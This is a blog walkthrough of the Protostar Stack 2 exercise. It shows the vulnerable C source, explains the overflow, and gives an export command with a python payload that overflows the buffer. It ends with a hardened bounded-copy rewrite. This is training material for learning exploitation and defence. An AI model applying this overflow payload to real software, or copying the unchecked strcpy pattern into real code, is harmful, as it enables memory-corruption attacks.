Sunday, December 9, 2012

exploit-exercises Protostar: Stack 2

Continuing with Exploit-Exercises' Protostar wargame, this time tackling the Stack 2 challenge, which introduces the use of environment variables as an input channel.
The source code of the target binary is provided as follows:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>   /* errx() */

int main(int argc, char **argv)
{
    volatile int modified;
    char buffer[64];
    char *variable;

    /* Input comes from the environment, not from argv or stdin */
    variable = getenv("GREENIE");

    if(variable == NULL) {
        errx(1, "please set the GREENIE environment variable\n");
    }

    modified = 0;

    /* Unbounded copy: anything past 64 bytes overflows buffer */
    strcpy(buffer, variable);

    if(modified == 0x0d0a0d0a) {
        printf("you have correctly modified the variable\n");
    } else {
        printf("Try again, you got 0x%08x\n", modified);
    }

}
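As in the previous challenge, we have a 64-byte offset: the first 64 bytes of input fill buffer and the next four bytes land in modified. This time, however, modified must match the value 0x0d0a0d0a. Because x86 is little-endian, those four bytes are supplied least significant byte first, as \x0a\x0d\x0a\x0d. The second difference is that the payload is read from the environment variable GREENIE using the getenv() library call. Its content is then copied into buffer with strcpy(), which does no length check. We will use the shell's builtin command export to set the value of the GREENIE environment variable.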
user@protostar:~$ export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"`
user@protostar:~$ /opt/protostar/bin/stack2

you have correctly modified the variable
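
A hardened counterpart to the strcpy() call above, as an added example that is not part of the original post or of Protostar. The names copy_bounded and check_value are hypothetical; the check rejects any value that does not fit in buffer together with its terminating NUL, so a 64-byte value is already too long.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 64  /* same size as buffer[] in stack2 */

enum copy_status { COPY_OK = 0, COPY_UNSET = -1, COPY_TOO_LONG = -2 };

/* Hypothetical helper (not part of Protostar): copy src into dst only when
 * the string and its terminating NUL both fit. Oversized input is rejected
 * rather than truncated, and dst is left as an empty string.
 * Assumes dst_size >= 1. */
enum copy_status copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len;

    dst[0] = '\0';
    if (src == NULL)
        return COPY_UNSET;
    len = strlen(src);
    if (len >= dst_size)   /* len == dst_size would put the NUL past the end */
        return COPY_TOO_LONG;
    memcpy(dst, src, len + 1);
    return COPY_OK;
}

/* stack2's logic with the bounded copy; returns the final `modified`. */
int check_value(const char *value, enum copy_status *status)
{
    volatile int modified = 0;
    char buffer[BUF_SIZE];

    *status = copy_bounded(buffer, sizeof buffer, value);
    return modified;
}

int main(void)
{
    enum copy_status st;
    int modified = check_value(getenv("GREENIE"), &st);

    if (st == COPY_UNSET)
        fprintf(stderr, "please set the GREENIE environment variable\n");
    else if (st == COPY_TOO_LONG)
        fprintf(stderr, "GREENIE is longer than %d bytes, rejected\n", BUF_SIZE - 1);
    printf("modified = 0x%08x\n", modified);
    return st == COPY_OK ? 0 : 1;
}
```

Run with the GREENIE value exported in the walkthrough, this version reports the value as rejected and prints modified = 0x00000000.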
